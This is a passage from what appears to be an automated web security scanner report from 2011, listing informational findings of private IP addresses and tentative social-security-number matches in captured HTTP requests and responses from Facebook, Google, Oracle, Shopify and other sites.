User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.72.46
X-Cnection: close
Date: Tue, 06 Sep 2011 16:10:19 GMT
Content-Length: 23259

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.19. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&api_key=57345927025&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df10f1711d%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.13.37
X-Cnection: close
Date: Tue, 06 Sep 2011 15:33:02 GMT
Content-Length: 32207

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.20. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://blogs.oracle.com/oracleopenworld/entry/intelligent_performance&layout=button_count&show_faces=false&width=126&action=like&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.57.47
X-Cnection: close
Date: Tue, 06 Sep 2011 16:10:19 GMT
Content-Length: 23309

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.21. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://blogs.oracle.com/oracleopenworld/entry/sting_q_a_part_two&layout=button_count&show_faces=false&width=126&action=like&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.217.63
X-Cnection: close
Date: Tue, 06 Sep 2011 16:10:19 GMT
Content-Length: 23308

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.22. http://www.fekkai.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fekkai.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /?gclid=COTMo_SIiasCFQ6AgwodqEol4A HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:37 GMT
Server: Apache
Set-Cookie: fekkai_flash_intro_cookie=True; expires=Wed, 05-Sep-2012 16:45:37 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 16218
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<script type="text/javascript">
swfobject.registerObject("flashObject", "10.0.0.0");
</script>
...[SNIP]...

23.23. http://www.google.com/sdch/StnTz5pY.dct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sdch/StnTz5pY.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sdch/StnTz5pY.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=UM-W7hk_5lna5JT_N9txdKVGnIyNY4wopCXXYtopjBtld5ONhmSDu6GJQ_In3uzA9a8cuXTpiucWjK0yk2HpxwRWas0z4viIZjV0bJJqE8Rpvlnnv4TJfoQ9H48sFabX
If-Modified-Since: Sat, 03 Sep 2011 05:07:34 GMT

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: application/x-sdch-dictionary
Last-Modified: Tue, 06 Sep 2011 16:00:23 GMT
Date: Tue, 06 Sep 2011 16:43:10 GMT
Expires: Tue, 06 Sep 2011 16:43:10 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 124609

Domain: .google.com
Path: /search

<!doctype html> <head> <title> - Google Search</title> <script>window.google={kEI:" NMWJ_5AK_rfB8gw",kEXPI:"28505,288 30316,31303,31405",kCSI
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: YKq3QHbl0RwJ:www.autotrader.com/+used+cary4a-lQGHU2cJ:www.vehix.com/+used+car &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com onmousedown="return clk(this.hre
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:rZQjSq2ux10J:translate.reference.com/+Hzpd6vNFcrsJ:translate.google.com/+ &hl=en&ct=clnk&gl=us&source=www.google.com','','','',' 9&hl=en&ct=clnk&gl=us&source=www.google.com','','',
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;cd=3 onmousedown="return clk(this.href,'','','',' ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','',' >
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:H75rMPosXksJ:www.cars.com/+used+carOJ7l3PBi2ywJ:www.usedcars.com/+used+car1nPyaj3yx18J:www.orbitz.com/App/DisplayCarSearch+ &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=ww
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: rnetlion.com/article/Direct-TV-vs-Dish-Network KvzX53GQf98J:www.directv.com/DTVAPP/content/My_Account OHG47yeqhSoJ:www.directv.com/DTVAPP/content/contact_us
...[SNIP]...

23.24. http://www.oracle.com/technetwork/community/developer-vm/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/community/developer-vm/index.html

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /technetwork/community/developer-vm/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41112056590278304,0:1)
Date: Tue, 06 Sep 2011 16:09:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134004

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<span style="font-size: smaller;">Oracle WebLogic Server 10.3.3.0</span>
...[SNIP]...
<span style="font-size: smaller;"> Oracle XE Universal Database 10.2.0.1</span>
...[SNIP]...
<span style="font-size: smaller;">Oracle WebLogic Server 10.3.4.0</span>
...[SNIP]...

23.25. http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/database/enterprise-edition/downloads/index.html

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /technetwork/database/enterprise-edition/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=235;ecid=41084439950149140,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 179935

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</em> Release 2 (10.2.0.5) for Microsoft
Windows (64-bit Itanium) </a>
...[SNIP]...
</em> Release 2 (10.2.0.4) for MAC OS
X on Intel x86-64 </a>
...[SNIP]...
</em> Release 2 (10.2.0.4) for Microsoft
Windows Vista x64, Microsoft Windows Server 2008 R2 x64,
Windows 7 x64 </a>
...[SNIP]...
</em> Release 2 (10.2.0.3/10.2.0.4) for
Microsoft Windows Vista, Windows Server 2008, Windows
7 </a>
...[SNIP]...
</em> Release 2 (10.2.0.2) for HP Tru64
UNIX </a>
...[SNIP]...
</em> Release 2 (10.2.0.2) for HP OpenVMS
Alpha </a>
...[SNIP]...
</em> Release 2 (10.2.0.2) for OpenVMS
Itanium </a>
...[SNIP]...
</em> Release 2 (10.2.0.2) for Solaris
Operating System (x86) </a>
...[SNIP]...
</em> Release 2 (10.2.0.2) for z/Linux
</a>
...[SNIP]...
</em> Release 2 (10.2.0.2) for z/OS (OS/390)
</a>
...[SNIP]...

23.26. http://www.oracle.com/technetwork/database/windows/downloads/index-101290.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/database/windows/downloads/index-101290.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /technetwork/database/windows/downloads/index-101290.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41156226034626734,0:1)
Date: Tue, 06 Sep 2011 16:09:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 198382

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<span sab="3102">Oracle Developer Tools for Visual Studio .NET 10.1.0.4</span>
...[SNIP]...
<span sab="3133">Oracle Developer Tools for Visual Studio .NET 10.1.0.4</span>
...[SNIP]...

23.27. http://www.oracle.com/technetwork/developer-tools/apex/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/developer-tools/apex/downloads/index.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /technetwork/developer-tools/apex/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41118116789228163,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139792

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<p>Oracle Application Express 4.1 is fully supported through Oracle Support Services on all Editions (SE1, SE, and EE) of the Oracle database, 10.2.0.3 or higher with a valid Oracle Database Technical Support agreement.</p>
...[SNIP]...

23.28. http://www.oracle.com/technetwork/developer-tools/jdev/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/developer-tools/jdev/downloads/index.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /technetwork/developer-tools/jdev/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=270;ecid=41074600181168427,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 163042

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<!-- B2B docs editor windows installer -->
   var R1B1 = 'http://download.oracle.com/otn/linux/oracle10g/xe/10201/oracle-xe-univ-10.2.0.1-1.0.i386.rpm';
   var R1B2 = 'http://download.oracle.com/otn/linux/middleware/11g/wls/1035/wls1035_linux32.bin';
   var R1B3 = 'http://download.oracle.com/otn/linux/middleware/11g/111150/ofm_rcu_linux_11.
...[SNIP]...
R2A11 = 'http://download.oracle.com/otn/nt/middleware/11g/111140/ofm_b2b_doc_editor_win_11.1.1.4.0_disk1_1of1.zip';
   var R2B1 = 'http://download.oracle.com/otn/linux/oracle10g/xe/10201/oracle-xe-univ-10.2.0.1-1.0.i386.rpm';
   var R2B2 = 'http://download.oracle.com/otn/linux/middleware/11g/wls/wls1034_linux32.bin';
   var R2B3 = 'http://download.oracle.com/otn/linux/middleware/11g/111140/ofm_rcu_linux_11.1.1.4
...[SNIP]...

23.29. http://www.oracle.com/technetwork/middleware/soasuite/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/middleware/soasuite/downloads/index.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /technetwork/middleware/soasuite/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35879579537054133,0:1)
Date: Tue, 06 Sep 2011 16:09:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 252619

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<!-- B2B docs editor windows installer -->
   var R1B1 = 'http://download.oracle.com/otn/linux/oracle10g/xe/10201/oracle-xe-univ-10.2.0.1-1.0.i386.rpm';
   var R1B2 = 'http://download.oracle.com/otn/linux/middleware/11g/wls/1035/wls1035_linux32.bin';
   var R1B3 = 'http://download.oracle.com/otn/linux/middleware/11g/111150/ofm_rcu_linux_11.
...[SNIP]...
R2A11 = 'http://download.oracle.com/otn/nt/middleware/11g/111140/ofm_b2b_doc_editor_win_11.1.1.4.0_disk1_1of1.zip';
   var R2B1 = 'http://download.oracle.com/otn/linux/oracle10g/xe/10201/oracle-xe-univ-10.2.0.1-1.0.i386.rpm';
   var R2B2 = 'http://download.oracle.com/otn/linux/middleware/11g/wls/wls1034_linux32.bin';
   var R2B3 = 'http://download.oracle.com/otn/linux/middleware/11g/111140/ofm_rcu_linux_11.1.1.4
...[SNIP]...
</a> 10.2.0.1 does not meet the minimum version requirement for supported use, but will generally work in a personal development environment.<br />
...[SNIP]...
</a> 10.2.0.1 does not meet the minimum version requirement for supported use, but will generally work in a personal development environment.<br />
...[SNIP]...
</a> 10.2.0.1 (only supported on <strong>
...[SNIP]...
</a> 10.2.0.1 does not meet the minimum version requirement for supported use, but will generally work in a personal development environment.<br />
...[SNIP]...
</a> 10.2.0.1 does not meet the minimum version requirement for supported use, but will generally work in a personal development environment.<br />
...[SNIP]...
</a> 10.2.0.1 (only supported on <strong>
...[SNIP]...

23.30. http://www.oracle.com/technetwork/oem/grid-control/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/oem/grid-control/downloads/index.html

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /technetwork/oem/grid-control/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=40974493081910025,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158895

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</i> Grid Control (10.2.0.5)</span>
...[SNIP]...
</i> Grid Control (10.2.0.4)</span>
...[SNIP]...
</i> Grid Control (10.2.0.3)</span>
...[SNIP]...
</i> Grid Control Release 1 (10.1.0.3)</span>
...[SNIP]...
</i> Grid Control Release 1 (10.1.0.2)</span>
...[SNIP]...
</em> Grid Control Management Agent Release 1 (10.1.0.2) for Windows Itanium</a>
...[SNIP]...
<a href="/technetwork/oem/grid-control/downloads/config-control-091160.html">Oracle Configuration Change Console Release 5 (10.2.0.5)</a>
...[SNIP]...

24. Social security numbers disclosed
There are 6 instances of this issue:

Issue background

Responses containing social security numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid SSNs and whether their disclosure within the application is appropriate.


24.1. http://assets.olark.com/a/assets/v0/site/7855-664-10-3086.js

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://assets.olark.com
Path:   /a/assets/v0/site/7855-664-10-3086.js

Issue detail

The following social security number was disclosed in the response:

Request

GET /a/assets/v0/site/7855-664-10-3086.js?cb=1315341238985&v=Loader05574e0e48ef9633b51ee007f4f6bf5ff HTTP/1.1
Host: assets.olark.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/tour
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 06 Sep 2011 15:48:35 GMT
Content-Type: application/x-javascript
Content-Length: 2887
Last-Modified: Thu, 01 Sep 2011 19:41:44 GMT
Connection: close
P3P: CP='Olark does not have a P3P policy. Learn why here: http://olark.com/p3p'
Accept-Ranges: bytes


(function(){
olark.extend('GoogleAnalytics');


var isNewVersion = olark._ && olark._.versions && (olark._.versions.follow || olark._.versions.popout)
if(isNewVersion) {
...[SNIP]...
,"disableJSStyles":1,"corner_position":"BR","width":"320","left_margin":20,"hkey":"PHNwYW4gc3R5bGU9ImRpc3BsYXk6bm9uZSI+PGEgaWQ9ImhibGluazkiPjwvYT5odHRwOi8vd3d3Lm9sYXJrLmNvbTwvc3Bhbj4=","site_id":"7855-664-10-3086","operators":{}},"GoogleAnalytics":{"enabled":true,"enable_custom_variables":true,"had_conversation_page_slot_number":5,"had_conversation_session_slot_number":4,"had_conversation_visitor_slot_number":3,"track_chat_start_page":true}});
}else{
olark.configure(function(conf){
conf.system.site_id="7855-664-10-3086";
});
olark._.finish();
}
})();

24.2. http://www.oracle.com/partners/en/opn-program/membership-resources/business-center/index.html

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.oracle.com
Path:   /partners/en/opn-program/membership-resources/business-center/index.html

Issue detail

The following social security number was disclosed in the response:

Request

GET /partners/en/opn-program/membership-resources/business-center/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41071516394601635,0:1)
Date: Tue, 06 Sep 2011 16:08:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 249980

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<td class="tdContentPadding" valign="top">Step 1: Dial 120 65 0065<br />
...[SNIP]...

24.3. http://www.shopify.com/admin/auth/login

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.shopify.com
Path:   /admin/auth/login

Issue detail

The following social security number was disclosed in the response:

Request

GET /admin/auth/login HTTP/1.1
Host: www.shopify.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _y=76726C16-B1FA-490A-93B3; optimizelyEndUserId=oeu1315341237551r0.5390826954971999; wcsid=4XOE7W6GWNHMEHMYS9583VOC78556641; hblid=JAQBX9FF2NF9W8U5RWCURZAD78556641; optimizelyBuckets=%7B%7D; olarkld=1315341237560; _oklv=1315341659210; __utma=262205262.1105150939.1315341127.1315341127.1315341127.1; __utmb=262205262.11.10.1315341127; __utmc=262205262; __utmz=262205262.1315341127.1.1.utmgclid=CK6YvLv4iKsCFSE8gwod-iiK3g|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; _s=08DB14DB-F588-4766-8659; __ar_v4=RFYZ2NEPUVBUFENBCOH6GL%3A20110906%3A2%7C4X7ERY5MVFDBLHMTRJRP2G%3A20110906%3A1%7C3CUMSMM7PFGSTPKIXDFOOO%3A20110906%3A3%7CEBPLYDUJ5RCZ3C7MBENLBV%3A20110906%3A3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Rack-Cache: fresh
X-Content-Digest: 38f4c37fa64459e11e554308ab3dd1ee00e72542
X-Runtime: 1645
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
X-Cacheable: NO:Not Cacheable
Content-Length: 15660
Date: Tue, 06 Sep 2011 15:41:17 GMT
X-Varnish: 1687908019
Age: 1
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
urn "static.olark.com/jsclient/loader0.js?ts="+(a?a[1]:(+new Date))})(document.cookie.match(/olarkld=([0-9]+)/)),name:"olark",methods:["configure","extend","declare","identify"]});olark.identify('7855-664-10-3086');/*]]>
...[SNIP]...

24.4. http://www.shopify.com/examples

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.shopify.com
Path:   /examples

Issue detail

The following social security number was disclosed in the response:

Request

GET /examples HTTP/1.1
Host: www.shopify.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/tour
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
